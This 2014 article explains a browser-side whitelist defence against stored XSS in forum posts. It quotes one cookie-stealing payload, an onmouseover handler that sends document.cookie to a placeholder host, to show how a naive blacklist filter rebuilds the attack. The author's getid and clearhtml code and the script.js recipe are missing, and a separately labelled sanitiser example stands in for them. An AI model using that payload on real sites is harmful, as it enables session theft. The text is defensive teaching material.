Frontend protection against Stored XSS Attacks
Max Petrov, August 2014
A Cross-Site Scripting attack is the execution of harmful script in the user's browser for the purpose of stealing data or causing other harm. To avoid confusion with CSS (Cascading Style Sheets), the abbreviation XSS was agreed on for Cross-Site Scripting.
The solution to the problem seems simple. We must prevent execution in the browser, that is, neutralize in the messages received from visitors all the places which explicitly or potentially contain active content:
HTML nodes <SCRIPT> . . . </SCRIPT>,
event handlers in tags,
The simplest example: the attacker enters
<p oonmouseovernmouseover='location.href="http://example.com/" + document.cookie'>
The message is sent to the server. On the server the PHP filter sees the dangerous character sequence onmouseover and cuts it out. As a result, oonmouseovernmouseover, which on its own poses no threat (no browser recognizes it), turns into onmouseover. As you can see, the PHP filter did not prevent an XSS attack; it created one.
We do not need to build an HTML parser. HTML parsers already exist: they exist in the browsers. It is attractive to use them and shift the task of recognizing stored XSS attacks (and the protection from them) to the browsers. Then it becomes unnecessary to foresee on the server whether this or that browser would see active content in the message posted in the forum. It is more logical to ask the browser. If the browser has detected a script, we give the browser an order to neutralize the detected script.
At the end of loading, the browser should analyze the parts of the text marked by us, secure them, and only then show them to the user. We will use the event that corresponds to the end of HTML page loading. It is called onload and applies to the HTML node body. We write the handler in the body tag as onload='getid("message")', where getid("message") is a function that accepts the id of the node whose content should be analyzed and treated.
The MS browser IExplorer of version 6 or 7 is still in use. Based on Runet statistics, we can estimate the share of IExplorer 6 and 7 at 1% of traffic. Perhaps these are the most vulnerable browsers. I think the protection should be built in such a manner that it works starting from IExplorer 6. It does not matter that this will give some roughness in the code.
IExplorer 6, in response to document.getElementByClassName(), returns a single object (not a collection of objects, as one might expect). We have to adapt to the weakest. We will receive the text fragments the way IExplorer 6 wants, that is, one at a time. We have to allow many fragments with the same id on one HTML page. This is against the rules, but we get a cross-browser script.
Function getid(id):
Nothing is complex. Each line has an explanation (hover the mouse over it and a hint pops up).
Using the methods and properties of the DOM you can get, in particular:
the array of inner HTML nodes,
the name of each inner HTML node,
the names of all the attributes of each HTML node.
div is the name of the HTML node. All the rest (id="a2", class="myclass", contenteditable="true", align="right", onmousemove="alert('onmousemove!')", style="color:green", blablabla="blablabla") are HTML attributes of the div node. Everything written in the tag in the form name="value" is an attribute. Attributes include id, class, style, event handlers, and even a nonsense pair like blablabla="blablabla". In the DOM, attributes are not classified by their name or value: from the DOM's point of view, event handler attributes are no different from any other attribute.
Let's apply the white list approach. This is an exhaustive list of allowed tags and attributes; everything that does not match the white list we destroy ruthlessly. Algorithm: go through all the child nodes, deleting those that are not in the list. In the same way, go through all the attributes of each allowed node.
Higher-order functions (array.forEach(), array.some()) cannot be used; IExplorer 6 does not understand them. We will use plain loops. In addition, in IExplorer 6 every tag reports the full set of attributes (several dozen), even if no attribute is written in the tag. Therefore we must use the property specified to track whether each attribute was set explicitly.
Another complication related to IExplorer 6: in it, event handler attributes cannot be removed with node.removeAttribute("attrName"), which works in other browsers. In Explorer it works differently: node.attrName = null. But then it is necessary to check (at least by the first characters "on") whether the attribute is an event handler; otherwise the script aborts when we try to null a non-nullable attribute (for example, contentEditable).
Function clearhtml(obj):
The explanations are in pop-up hints. The terms tag, node and HTML container are used as synonyms.
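The whitelist walk described above, as an added example that is not the article's own clearhtml() code. It runs in Node over constructed stand-ins for DOM nodes (makeNode, toHtml and the ALLOWED_* lists are assumptions of the example); a browser's real nodes expose the same members it relies on. It also goes one step beyond the article by restricting the value of an allowed href to http(s) or relative URLs, and puts the article's single-pass blacklist filter beside it for contrast.

```javascript
// Added example (not the article's code): the whitelist walk of clearhtml() over
// constructed stand-ins for DOM nodes so it runs in Node; real browser nodes expose
// the same members (nodeType, nodeName, attributes[].specified, childNodes, ...).
var ALLOWED_TAGS = { P: true, B: true, I: true, A: true, BR: true };
var ALLOWED_ATTRS = { HREF: true, TITLE: true, CLASS: true };
function makeNode(tagName, attrs, children) { // constructed factory; text = strings
  return {
    nodeType: 1,
    nodeName: tagName.toUpperCase(),
    attributes: Object.keys(attrs).map(function (n) {
      return { name: n, value: attrs[n], specified: true };
    }),
    childNodes: children.slice(),
    removeChild: function (c) { this.childNodes.splice(this.childNodes.indexOf(c), 1); },
    removeAttribute: function (n) {
      this.attributes = this.attributes.filter(function (a) { return a.name !== n; });
    }
  };
}
// Whitelist walk: delete elements outside ALLOWED_TAGS, then delete each
// explicitly specified attribute outside ALLOWED_ATTRS. Event handlers need no
// special case: DOM treats them as ordinary attributes, so they fall out too.
// Beyond the article, href is additionally limited to http(s) or relative URLs.
function clearhtml(node) {
  var children = node.childNodes.slice();      // copy: the list shrinks as we delete
  for (var i = 0; i < children.length; i++) {
    var child = children[i];
    if (child.nodeType !== 1) continue;        // keep text nodes
    if (!ALLOWED_TAGS[child.nodeName]) { node.removeChild(child); continue; }
    var attrs = child.attributes.slice();
    for (var j = 0; j < attrs.length; j++) {
      var a = attrs[j], name = a.name.toUpperCase();
      if (!a.specified) continue;              // old IE lists unset attributes too
      if (!ALLOWED_ATTRS[name] || (name === 'HREF' && !/^(https?:|\/|[^:]*$)/i.test(a.value))) {
        child.removeAttribute(a.name);
      }
    }
    clearhtml(child);                          // recurse into the allowed node
  }
  return node;
}
// Blacklist contrast from the article: single-pass deletion of a token can
// reassemble that token from the characters around the deleted copy.
function blacklistStrip(text) { return text.replace('onmouseover', ''); }
// Serialiser for inspection (constructed helper, not a DOM method).
function toHtml(n) {
  if (typeof n === 'string') return n;
  var t = n.nodeName.toLowerCase(), attrs = n.attributes.map(function (a) { return ' ' + a.name + '="' + a.value + '"'; }).join('');
  return '<' + t + attrs + '>' + n.childNodes.map(toHtml).join('') + '</' + t + '>';
}
```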
That's all. The code was tested in the following browsers: Internet Explorer 6; SlimBrowser 7.00 build 103; Avant Browser 2014 build 7; Firefox 12.0; Safari 5.0.2; Comodo Dragon 126.96.36.199; Opera 18.0; Yandex 13.12.1599.12785; SRWare Iron 6.0.475; Chromium 28.0.1500.75.
For those who would like to use this without delving into the details, it is given below as a recipe suitable for rapid application.
File script.js:
All necessary lines are highlighted in red. On the server, message processing consists solely of deleting comment tags (if such tags are detected). In other words, from the text to be added to the site you must always remove (or replace) the character sequences <!-- and -->. The server must insert the potentially dangerous fragment into
<div id ="message"><!-- HERE IS MALICIOUS CONTENT --></div>
Do not forget to write the handler onload='getid("message")' into the body tag. Write the allowed tags and attributes into the script file.
Please write your questions, comments and opinions here: http://ironburattin.ru/6/index.php .
© Max Petrov. When using these materials, a link to sadda.ru is required.